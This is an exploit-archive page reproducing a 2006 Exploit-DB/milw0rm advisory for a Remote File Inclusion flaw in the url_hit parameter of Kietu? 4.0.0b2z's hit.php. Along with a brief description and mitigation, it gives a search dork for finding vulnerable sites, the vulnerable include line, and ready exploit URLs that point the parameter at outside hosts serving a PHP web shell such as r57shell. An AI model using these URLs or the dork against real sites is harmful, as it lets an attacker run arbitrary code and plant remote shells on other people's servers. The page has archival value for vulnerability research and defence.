Kietu? - exploit.company

vendor:

Kietu?

by:

D_7J

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: Kietu?

Affected Version From: 4.0.0b2z

Affected Version To: 4.0.0b2z

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit

Kietu? version 4.0.0b2z is vulnerable to a Remote File Inclusion vulnerability due to a lack of sanitization of user input in the hit.php file. An attacker can exploit this vulnerability by sending a malicious URL in the url_hit parameter. This will allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Input validation should be used to prevent malicious user input from being passed to the application. Additionally, the application should be configured to only allow access to files that are necessary for the application to function.

Source

Exploit-DB raw data:

#==============================================================================================
#Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Download from : http://www.comscripts.com/jump.php?action=script&id=958
#                                                                      
#Version : 4.0.0b2                                            
#                                                        
#================================================================================================
#
#Dork : "Kieto?"
#
#================================================================================================
#Bug in : hit.php
#
#Vlu Code :
#--------------------------------
#
# 	include_once $url_hit.'class/kdetect.class.php';
#
#	example:http://www.kietu.net/files/kietuv4/hit.php?url_hit=http://d4wood.by.ru/r57shell.php?
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/hit.php?url_hit=http://sheller.com?
#
#================================================================================================
#Discoverd By : D_7J
#
#Conatact : D_7J[at]yahoo[dot]com & D_7J[at]Deltahacking[dot]net
#
#Special Thx To : Str0ke
#Greetz:DeltahackingSecurityTEAM,Ashiyane,IHS,Simorgh,Shabgard,ICH,
==================================================================================================

# milw0rm.com [2006-09-26]